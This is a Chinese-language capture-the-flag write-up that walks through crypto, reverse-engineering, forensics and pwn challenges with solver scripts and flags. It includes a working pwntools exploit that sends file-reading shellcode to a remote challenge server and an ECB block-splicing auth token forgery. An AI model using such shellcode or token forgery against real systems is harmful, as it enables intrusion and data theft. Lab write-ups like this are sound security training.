情报收集
黑客密室逃脱
可以得到源码,同时注意到hidde.txt
访问得到解密密钥
1
2
3
4
5
6
7
8
9
10
11
12
| def simple_decrypt(encrypted_hex, key):
encrypted = bytes.fromhex(encrypted_hex)
decrypted = []
for i in range(len(encrypted)):
key_char = key[i % len(key)]
decrypted_char = encrypted[i] - ord(key_char)
decrypted.append(decrypted_char)
return bytes(decrypted).decode()
encrypted_sensitive_info = "d9d1c4d9e0a594a296b1696a9665a6c69ca492a893a09aa66a6d699ba09599d39daa94a296ac976c6ab5"
encryption_key = "secret_key1618"
print(simple_decrypt(encrypted_sensitive_info, encryption_key))
|
flag{1571884e-3a92-4455-978c-06a865713f69}
密码破解
Enigma
打开html
还原,得到flag
flag{HELLOCTFERTHISISAMESSAGEFORYOU}
ECBTrain
1
2
3
4
5
6
7
8
9
10
11
| import base64
auth1='Q6CuxXaTPqzBF2bqNpkCSZfrsh97J+W+Bv50Or1kNUk='
auth2='Q6CuxXaTPqzBF2bqNpkCSY0K/dKd03+hFjL3V7PwF8o='
print(base64.b64decode(auth1))
print(base64.b64decode(auth2))
print(base64.b64encode(b"\x97\xeb\xb2\x1f{'\xe5\xbe\x06\xfet:\xbdd5I").decode())
|
逆向分析
ShadowPhases
在比较处打断点
Str2就是flag
flag{0fa830e7-b699-4513-8e01-51f35b0f3293}
BashBreaker
数字15每次减去1-3,谁先减到0谁获胜
可以得到real_key的值EC3700DFCD4F364EC54B19C5E7E26DEF6A25087C4FCDF4F8507A40A9019E3B48BD70129D0141A5B8F089F280F4BE6CCD
在函数中注意到魔改的RC4
同时在数据段中发现ONE_PIECE,猜测是密文,得到的key是秘钥,去解RC4
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
| #include <stdio.h>
#include <stdlib.h>
#include <string.h>
typedef struct {
unsigned char S[256];
int i, j;
} RC4_CTX;
void rc4_init(RC4_CTX *ctx, const unsigned char *key, unsigned long key_len) {
int i, j = 0;
for (i = 0; i < 256; ctx->S[i] = i, i++);
for (i = 0; i < 256; j = ((key[i % key_len] ^ 0x37) + ctx->S[i] + j) % 256,
ctx->S[i] ^= ctx->S[j] ^= ctx->S[i] ^= ctx->S[j], i++);
ctx->i = ctx->j = 0;
}
unsigned char rc4_next(RC4_CTX *ctx) {
ctx->i = (ctx->i + 1) % 256;
ctx->j = (ctx->j + ctx->S[ctx->i]) % 256;
ctx->S[ctx->i] ^= ctx->S[ctx->j] ^= ctx->S[ctx->i] ^= ctx->S[ctx->j];
unsigned char v2 = ctx->S[(ctx->S[ctx->i] + ctx->S[ctx->j]) % 256];
return (v2 << 4) | (v2 >> 4);
}
void decrypt(const unsigned char *key, const unsigned char *ciphertext, int len, unsigned char *plaintext) {
RC4_CTX ctx;
rc4_init(&ctx, key, strlen((const char *)key));
for (int i = 0; i < len; plaintext[i] = ciphertext[i] ^ rc4_next(&ctx), i++);
plaintext[len] = '\0';
}
int main() {
const char *key = "EC3700DFCD4F364EC54B19C5E7E26DEF6A25087C4FCDF4F8507A40A9019E3B48BD70129D0141A5B8F089F280F4BE6CCD";
const char *ciphertext_hex = "BBCA1214D0F199A79148C32873ADB7758C89CDDD2D505D7F95B1A49D0943E1D2E966EA1898C6CC023918";
int len = strlen(ciphertext_hex) / 2;
unsigned char *ciphertext = malloc(len), *plaintext = malloc(len + 1);
for (int i = 0; i < len; sscanf(ciphertext_hex + 2*i, "%2hhx", &ciphertext[i]), i++);
decrypt((const unsigned char *)key, ciphertext, len, plaintext);
printf("Decrypted: %s\n", plaintext);
free(ciphertext); free(plaintext);
return 0;
}
|
这道题多少有点猜的成分。。。
flag{8263b6c6-094d-4bd8-bbc2-b63ab34e8db7}
数据分析
flowzip
CTF-NetA一把嗦
flag{c6db63e6-6459-4e75-bb37-3aec5d2b947b}
ezEvtx
4663事件中发现文件
flag{confidential.docx}
漏洞挖掘分析
星际XML解析器
xxe漏洞
RuneBreach
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
| from pwn import *
import time
context.arch = 'amd64'
context.log_level = 'debug'
def exploit():
p = remote('39.106.18.186', 29626)
p.recvuntil(b'==== BOSS BATTLE START ====')
for _ in range(4):
p.recvuntil(b'Defend? (y/N): ')
p.sendline(b'N')
p.recvuntil(b'[BOSS] Your place is mine now ')
exec_addr = int(p.recvuntil(b'!', drop=True), 16)
log.success(f"Executable Area: {hex(exec_addr)}")
shellcode = asm('''
/* 直接打开并读取flag文件 */
xor rsi, rsi
push rsi
mov rdi, 0x67616c662f /* /flag */
push rdi
mov rdi, rsp
/* open(rdi, O_RDONLY) */
xor rsi, rsi
xor rdx, rdx
mov rax, 2
syscall
/* read(fd, rsp, 0x100) */
mov rdi, rax
mov rsi, rsp
mov rdx, 0x100
xor rax, rax
syscall
/* write(1, rsp, rax) */
mov rdi, 1
mov rdx, rax
mov rax, 1
syscall
/* exit(0) */
xor rdi, rdi
mov rax, 60
syscall
''')
log.info(f"Shellcode length: {len(shellcode)} bytes")
p.recvuntil(b'territory: ')
p.send(shellcode)
time.sleep(1)
flag = p.recvall()
print(f"Flag: {flag}")
if __name__ == '__main__':
exploit()
|
